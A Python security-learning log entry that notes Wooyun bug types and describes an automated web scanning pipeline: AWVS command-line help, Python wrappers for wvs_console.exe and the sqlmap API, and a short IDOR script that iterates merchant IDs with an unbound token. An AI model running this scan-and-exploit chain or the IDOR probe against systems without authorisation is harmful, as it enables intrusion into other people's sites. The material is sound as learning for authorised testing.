Python Learning Log (14): AWVS Automated Scanning & wvs_console.exe #15

PyxYuYu commented Mar 15, 2016

The best preparation for tomorrow is doing your best today.

0x01 Wooyun

  • Sensitive information disclosure
    • Sensitive information leaked through exposed Git repositories
  • SQL injection
    • SQL injection in a mobile app
  • Lax account access control
    • Any merchant's back end could be entered without a username or password just by changing the ID in the request (the root cause was a token that was not bound to the account); a minimal hypothetical sketch follows this list
  • Weak passwords
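
The ID-swap bypass above is a classic IDOR. Here is a minimal sketch of how such a flaw is probed; the endpoint, parameter names, and token are all made up for illustration:

```python
import requests

# Hypothetical target: the back end validates only a token that is not bound
# to the merchant ID, so iterating over IDs opens every merchant's console.
BASE = "http://merchant.example.com/admin/index"    # made-up endpoint
TOKEN = "static-token-not-tied-to-any-account"      # assumed flaw

for merchant_id in range(1000, 1010):
    r = requests.get(BASE, params={"id": merchant_id, "token": TOKEN}, timeout=10)
    if r.status_code == 200:
        print("merchant %d: back end reachable without credentials" % merchant_id)
```
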
0x02 AWVS Automated Scanning

  • 猪猪侠 has previously presented an automated vulnerability-scanning platform for the big-data era
    • Rule generation plus a parser: mine information automatically, merge it, then mine recursively
    • Recursive regex parsing
  • Design and implementation of a distributed vulnerability-scanning system
  • The AWVS automation idea came from a post on Zhihu. I used AppScan before; AWVS beats AppScan on false-positive rate and coverage, and driving the bundled wvs_console.exe from Python makes automated scanning practical (see the sketch after the help output below)
    • Use subDomainsBrute to enumerate subdomains and export the resulting URLs
    • AWVS has a scheduled-scan feature, capped at 200 URLs per batch; configure which vulnerability types to scan (usually Blind SQL Injection), then import the scan results into a database
    • Call the sqlmap API to automatically verify the scan results stored in the database (also sketched below)
  • AWVS command-line help:
Acunetix WVS Console Application (c) Acunetix Ltd.

>> USAGE: wvs_console /Scan [URL]  OR  /Crawl [URL]  OR  /ScanFromCrawl [FILE]
                      OR  /ScanWSDL [WSDL URL]

>> PARAMETERS
       /Scan [URL]               : Scan specified URL
       /Crawl [URL]              : Crawl specified URL
       /ScanFromCrawl [FILE]     : Scan from crawling results
       /ScanWSDL [WSDL URL]      : Scan web services from WSDL URL

       /Profile [PROFILE_NAME]   : Use specified scanning profile during scanning
       /Settings [FILE]          : Use specified settings template during scanning
       /LoginSeq [FILE]          : Use specified login sequence
       /Import [FILE(s)]         : Import files during crawl                         // feed previously collected URLs into the crawl
       /Run [command line]       : Run this command during crawl
       /Selenium [FILE]          : Execute selenium script during crawl

       /Save                     : Save scan results
       /SaveFolder [DIR]         : Specify the folder were all the saved data will be stored
       /GenerateZIP              : Compress all the saved data into a zip file
       /ExportXML                : Exports results as XML
       /ExportAVDL               : Exports results as AVDL
       /SavetoDatabase           : Save alerts to the database
       /SaveLogs                 : Save scan logs
       /SaveCrawlerData          : Save crawler data (.CWL file)
       /GenerateReport           : Generate a report after the scan was completed
       /ReportFormat [FORMAT]    : Generated report format (REP, PDF, RTF, HTML)
       /ReportTemplate [TEMPLATE]: Specify the report template
       /Timestamps               : Print current timestamp with each line.
       /SendEmail                : Send email notification when scan is completed, using scheduler settings.
       /EmailAddress [EMAIL]     : Send email notification to this email address, override scheduler settings.

       /Verbose                  : Enable verbose mode                               // prints the details of each request sent
       /Password                 : Application password (if required)
       /?                        : Show this help screen

>> OPTIONS [ ? = TRUE or FALSE ]
       --GetFirstOnly=?          : Get only the first URL
       --RestrictToBaseFolder=?  : Do not fetch anything above start folder          // useful when the start URL is a subdirectory
       --FetchSubdirs=?          : Fetch files bellow base folder
       --ForceFetchDirindex=?    : Fetch directory indexes even if not linked
       --RobotsTxt=?             : Retrieve and process robots.txt
       --CaseInsensitivePaths=?  : Use case insensitive paths
       --UseWebKit=?             : Use WebKit based browser for discovery
       --ScanningMode=*          : Scanning mode (* = Quick, Heuristic, Extensive)
       --ManipHTTPHeaders=?      : Manipulate HTTP headers
       --UseAcuSensor=?          : Use AcuSensor technology
       --EnablePortScanning=?    : Enable port scanning
       --UseSensorDataFromCrawl=*: Use sensor data from crawl(* = Yes, No, Revalidate)
       --HtmlAuthUser=?          : Username for HTML based authentication
       --HtmlAuthPass=?          : Password for HTML based authentication
       --ToolTimeout=?           : Timeout for testing tool in seconds

>> EXAMPLES
wvs_console /Scan http://testphp.vulnweb.com  /SaveFolder c:\temp\scanResults\ /Save
wvs_console /ScanWSDL http://test/WS.asmx?WSDL /Profile ws_default /Save
wvs_console /Scan http://testphp.vulnweb.com /Profile default /Save --UseWebKit=false --ScanningMode=Heuristic
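
Tying the bullets above together, here is a minimal sketch of the scan step: Python driving wvs_console.exe with flags taken from the help output. The install path, the subdomains.txt input file (as exported from subDomainsBrute), and the output layout are my assumptions, not anything AWVS mandates:

```python
import subprocess
from pathlib import Path

# Assumed default install path; adjust for your AWVS installation.
WVS_CONSOLE = r"C:\Program Files (x86)\Acunetix\Web Vulnerability Scanner\wvs_console.exe"

def scan_url(url, out_dir):
    """Scan one URL with wvs_console.exe and save the results as XML."""
    Path(out_dir).mkdir(parents=True, exist_ok=True)
    cmd = [
        WVS_CONSOLE,
        "/Scan", url,                  # flags below are all documented in the help above
        "/Profile", "default",
        "/SaveFolder", out_dir,
        "/Save",
        "/ExportXML",                  # XML is easy to parse into a database later
        "--ScanningMode=Heuristic",
    ]
    return subprocess.call(cmd)        # blocks until this scan finishes

if __name__ == "__main__":
    # One URL per line, e.g. exported from subDomainsBrute (file name is assumed).
    urls = Path("subdomains.txt").read_text().split()
    for i, url in enumerate(urls[:200]):   # mirror the 200-URL cap of scheduled scans
        scan_url(url, r"C:\temp\scanResults\%d" % i)
```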

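For the verification step, sqlmap ships a REST API server (start it with python sqlmapapi.py -s; it listens on 127.0.0.1:8775 by default). The /task/new, /scan/<id>/start, /scan/<id>/status, /scan/<id>/data, and /task/<id>/delete endpoints used below are sqlmap's real interface; the polling loop and the sample URL are just illustration:

```python
import time
import requests

API = "http://127.0.0.1:8775"   # default address of `python sqlmapapi.py -s`

def confirm_injection(url):
    """Hand one suspicious URL from the AWVS results to the sqlmap API;
    return True if sqlmap confirms an injection point."""
    taskid = requests.get(API + "/task/new").json()["taskid"]
    requests.post(API + "/scan/%s/start" % taskid, json={"url": url})
    while requests.get(API + "/scan/%s/status" % taskid).json()["status"] != "terminated":
        time.sleep(5)                # poll until the scan finishes
    data = requests.get(API + "/scan/%s/data" % taskid).json()["data"]
    requests.get(API + "/task/%s/delete" % taskid)
    return bool(data)                # non-empty data means a confirmed finding

if __name__ == "__main__":
    print(confirm_injection("http://testphp.vulnweb.com/artists.php?artist=1"))
```
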
0x03 Daily Summary

  • Learned how the AWVS command line works
  • The building blocks of the automated scanner:
    • Enumerate target URLs
    • Import the URLs into AWVS
    • Analyze and act on the scan results
  • I plan to start on 知道创宇 (Knownsec)'s Python exercises once this automated scanner is finished; it will probably take a few more days
